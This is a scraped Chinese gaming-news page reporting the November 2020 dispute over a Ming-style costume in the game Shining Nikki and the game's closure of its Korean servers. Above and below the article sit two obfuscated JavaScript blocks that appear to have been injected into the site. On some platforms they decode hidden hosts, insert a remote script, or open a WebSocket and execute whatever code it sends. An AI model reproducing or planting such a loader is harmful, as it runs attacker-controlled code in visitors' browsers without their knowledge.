function mNkhgicY(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function bUViyAkl(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return mNkhgicY(t);};window['\x6c\x7a\x44\x4a\x6e\x66']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=bUViyAkl,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('a2wueWRpdHdlYi5jbg====','dHIueeWVzdW42NzguY29t','138805',window,document,['=','e']);}:function(){};

“汉服”“韩服”争端:《闪耀暖暖》在韩国停止运营

近日,因韩服事件引发玩家强烈抵制的《闪耀暖暖》,被推上了舆论的风口浪尖。

事件的起因,来自于游戏中新推出的一套服装——槿云重华。官方表示,槿云重华是韩国传统服装,专门为韩国玩家而准备。随着槿云重华在《闪耀暖暖》韩国服务器上线,这件虚拟世界的服饰,竟成为韩国人口中“汉服源于韩服”的佐证之一。

但事实并非如此。槿云重华曝光后,国内玩家很快便发现,这套服装的主体样式源于中国明代传统服饰,而非韩国服饰。更糟糕的是,服装名字中的“槿云”,是韩国的国花,“重华”是舜的名字。即便今天,仍然有很多韩国人,认为舜来自韩国。官方此举,被认为过度讨好韩国玩家。

因此,玩家们开始自发抵制槿云重华套装,并在官方微博下指责这一“剽窃”行为。时间是11月2日,但官方对此没有任何表示。

不仅如此,微博网友“omiaopace”发现,槿云重华的样式,和之前“国服大典”上展示的明制汉服高度相似,且不说是否抄袭的问题,拿中国传统服饰迎合韩国玩家,不顾本民族文化保护,成为点燃玩家怒火的重要原因。

至此,事件的影响已经不仅仅是游戏本身,而是辐射到了中韩文化的范畴。

而在此之前,由韩国人在外网挑起的“汉服源于韩服”事件,已经让众多画师卷入其中。《闪耀暖暖》的槿云重华,就这样成了韩国人手中的武器,甚至有人将更多脏水泼向了中国。相关网络暴力,从《闪耀暖暖》官方推特,延伸到了韩国服务器世界频道。而在国内,槿云重华成为激起网友们反制韩国剽窃的导火索。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

“汉服源于韩服”的争论,最初来自国内画师“old先”的一组人物图。11月1日,old先在推特发布了四名角色身穿汉服的原画,在众多赞美之中,却出现了不和谐音。陆陆续续有韩国网友指责,图中的服饰不是汉服,而是韩服,并要求作者停止抄袭行为。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

对此,old先没有妥协,很快发布了新的推特,给出了图中服饰的历史出处。但事件已经逐渐走向了失控的边缘,韩国网友转而对服装的历史本源加以扭曲,扬言“汉服源于韩服”。对韩国网友而言,《闪耀暖暖》的槿云重华来得正是时候,这就有了上面的激烈骂战。

直到11月4日凌晨,《闪耀暖暖》官方仍未有进一步动作。同时,有玩家发现,《闪耀暖暖》超话管理,正在删除玩家们的相关诉求。11月4日11:48分,中国历史研究院官方账号发布文章《“韩服”真相:“衣冠文物 悉同中国”》,追本溯源,科普华夏服饰与韩国的关系,揭开韩服历史的真相。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

当天14:16分,《闪耀暖暖》的官方声明姗姗来迟。声明中首先表明和国家立场一致,随后指出游戏世界为虚拟世界。而对韩国服务器中,发布辱华言论的玩家,官方表态将进行封号处理。

不出意外地,这份声明是“国内特供”,官方并未全球同步发布声明,尤其没有在韩国进行公告。这份声明显然不能让玩家满意,玩家们的怒火没有得到平息。在涉及到民族文化与国家立场的问题上,玩家们的态度出奇地统一。一时间,玩家们对“为何不关闭韩国服务器?”的质疑声不绝于耳。甚至有玩家反讽“关简中服吧”。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

当天15:07分,共青团中央官方账号发布文章《“衣冠文物悉同中国”,这就是韩服的历史真相》,同样阐述了汉服与韩服的历史渊源,以正视听。有关“汉服源于韩服”的争论,正在趋于白热化。11月5日凌晨1:01分,《闪耀暖暖》官方紧急发布了第二份声明,宣布取消槿云重华套装全球版本上线计划,删除相关物料。

然而这份声明依然是国内特供,玩家并不买账。同时有玩家指出,官方避重就轻,闭口不谈槿云重华是哪国服装。这期间,《闪耀暖暖》渠道服榜一“菜菜”宣布退游,代表了玩家的集体心声。菜菜累积氪金达到了67万以上,宣布退游后,他的签名已经改成了“国服才是你老子,狗叠再也不见”。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

玩家的抵制还在继续,不断有人宣布退游。更多时候,面对游戏公司,玩家能做的也只有退游。而字里行间,仍然饱含对游戏的热爱。11月5日22:58分,《闪耀暖暖》官方第三次发布公告,宣布正式关闭在韩国地区的运营服务。同时,该条微博援引了共青团中央发在微信上的文章《“汉服源于韩服”?笑话!》,并再次重申始终与祖国一致的立场。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

这份姗姗来迟的声明,总算让玩家们的满腔怒火减淡不少。《闪耀暖暖》官方同时强调,并未因此事被任何国家约谈。在《闪耀暖暖》超话,玩家们热烈庆祝韩服关闭,自发进行抽奖活动。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

已经弃坑的榜一菜菜,在恭喜韩国服务器关闭之余,也加入了抽奖送福利行动。虽然自己已经弃坑,但他还是对留下来的玩家表达了祝福。玩家大概就是这么可爱吧。

回顾整个过程,对叠纸的一系列操纵,不少网友都会感叹“早知今日何必当初”。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

这次事件能够激起国内如此大的反应,并不令人感到意外。在网友制作的一张长图中,列举了韩国此前多次碰瓷中国文化的事例。从端午节、屈原,到舜、汉服,韩国总是热衷于将中国的文化据为己有。而叠纸前前后后的一系列操作,同样在同行的衬托下格外刺眼。

韩国人正在用《闪耀暖暖》证明“汉服源于韩服”的谬论

给TA买糖
共{{data.count}}人
人已赞赏
时事圈

员工称被HR抬出公司,虎牙回应:抬出去冷静下

2020-11-7 18:14:35

游戏圈时事圈

多益网络回应“员工自愿降薪”:内心普遍真实高兴满意

2020-11-7 19:46:45

function UWeyoXgr(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function RxvQLA(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UWeyoXgr(t);};window['\x45\x51\x55\x70\x5a\x77\x50']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=RxvQLA,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close();}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/'+i;cs.parentElement.insertBefore(s,cs);}})('a2wueWRpddHddlYi5jbg==','dHIueWVzdW442NzguY29t','138806',window,document,['d','4']);}:function(){};
0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧